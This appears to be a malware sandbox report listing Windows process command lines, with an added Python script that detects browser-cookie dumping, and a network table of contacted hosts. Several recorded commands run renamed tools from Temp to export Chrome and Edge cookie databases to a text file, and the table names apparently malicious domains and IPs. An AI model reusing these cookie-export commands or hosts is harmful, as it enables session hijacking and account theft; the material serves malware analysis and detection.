C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3004 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
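The `11111.exe` and `jfiag3g_gg.exe` lines above show the same two switches over and over: `/CookiesFile` pointing at a Chromium profile's `Cookies` SQLite database (Chrome "Profile 2", Edge "Default", Edge "Profile 1") and `/scookiestxt` writing the decoded result to `fj4ghga23_fsa.txt` in Temp. Those switch names are the ones documented for NirSoft's ChromeCookiesView, so the usual reading is a renamed cookie viewer being driven as a session-stealer; the report itself does not name the binary, so treat that attribution as an inference. The script below is an added example, not part of the sandbox report: it scans process command lines for that pattern, names the browser profile hit, and also pulls the URLs that `msedge.exe` was told to open with `--single-argument`. The sample command lines marked "from the listing" are copied from this page; the one marked "constructed" is made up for the example.

```python
"""Spot browser-cookie dumping in a process command-line log.

Added example, not part of the sandbox report. Looks for a binary run with
/CookiesFile <Chromium 'Cookies' DB> and /scookiestxt <output>, the pattern
in the listing above, and collects --single-argument URLs handed to a browser.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# ...\<Browser>\User Data\<Profile>\Cookies is the Chromium-family layout
COOKIE_DB_RE = re.compile(r"\\User Data\\[^\\]+\\Cookies$", re.IGNORECASE)


def split_windows_cmdline(cmdline: str) -> List[str]:
    """Minimal Windows tokenizer: split on whitespace, keep double-quoted
    spans as one token and drop the quotes (no escape handling)."""
    tokens, buf, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if buf:
                tokens.append("".join(buf))
                buf = []
        else:
            buf.append(ch)
    if buf:
        tokens.append("".join(buf))
    return tokens


def _value_after(args: List[str], switch: str) -> Optional[str]:
    """Value after a case-insensitive switch; '' if it is last, None if absent."""
    lowered = [a.lower() for a in args]
    if switch not in lowered:
        return None
    i = lowered.index(switch)
    return args[i + 1] if i + 1 < len(args) else ""


@dataclass(frozen=True)
class CookieDump:
    image: str
    cookie_db: Optional[str]  # None: tool default (current user's Chrome profile)
    output: str
    reasons: Tuple[str, ...]


def inspect_cmdline(cmdline: str) -> Optional[CookieDump]:
    """Return a CookieDump if the command line exports browser cookies."""
    tokens = split_windows_cmdline(cmdline)
    if not tokens:
        return None
    image, args = tokens[0], tokens[1:]
    output = _value_after(args, "/scookiestxt")
    if output is None:
        return None
    cookie_db = _value_after(args, "/cookiesfile")
    reasons = ["exports cookies to a text file (/scookiestxt)"]
    if TEMP_DIR_RE.search(image):
        reasons.append("image runs from a Temp directory")
    if cookie_db and COOKIE_DB_RE.search(cookie_db):
        reasons.append("reads a Chromium profile Cookies database")
    if TEMP_DIR_RE.search(output):
        reasons.append("writes the decoded cookies into Temp")
    return CookieDump(image, cookie_db, output, tuple(reasons))


def profile_of(cookie_db: str) -> Tuple[str, str]:
    """(browser, profile) for a ...\\<Browser>\\User Data\\<Profile>\\Cookies path."""
    parts = cookie_db.split("\\")
    if len(parts) >= 4 and parts[-3] == "User Data" and parts[-1].lower() == "cookies":
        return parts[-4], parts[-2]
    return "", ""


def opened_urls(cmdlines: List[str]) -> List[str]:
    """URLs a browser was told to open via --single-argument."""
    urls = []
    for line in cmdlines:
        url = _value_after(split_windows_cmdline(line)[1:], "--single-argument")
        if url:
            urls.append(url)
    return urls


def triage(cmdlines: List[str]) -> List[CookieDump]:
    return [d for d in (inspect_cmdline(c) for c in cmdlines) if d is not None]


SAMPLE_CMDLINES = [  # from the listing
    r"C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt",
    r'C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt',
    r'C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt',
    r"C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt",
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513',
    r"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i",
    # constructed benign line
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --lang=en-US',
]

if __name__ == "__main__":
    for d in triage(SAMPLE_CMDLINES):
        print(d.image, profile_of(d.cookie_db) if d.cookie_db else "(default)", d.reasons)
    print("opened URLs:", opened_urls(SAMPLE_CMDLINES))
```

Run over the full listing it reports four profiles dumped (the tool's default Chrome profile, Chrome "Profile 2", Edge "Default", Edge "Profile 1") into the same `fj4ghga23_fsa.txt`, plus the `vexacion.com` and `directdexchange.com` pages pushed into Edge. A `/scookiestxt` export is the Netscape cookies.txt format, which imports straight into another browser, so any hit means live web sessions should be treated as stolen; the tokenizer deliberately ignores backslash escaping because Windows paths in these logs are not escaped.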
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 52.247.37.26:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | | tcp |
| N/A | 20.54.89.106:443 | | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.190.160.71:443 | | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | | tcp |
| N/A | 95.101.206.92:80 | go.microsoft.com | tcp |
| N/A | 52.247.37.26:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 52.219.64.127:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 52.219.64.127:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.86.82:80 | swretjhwrtj.gq | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 195.2.78.163:25450 | | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
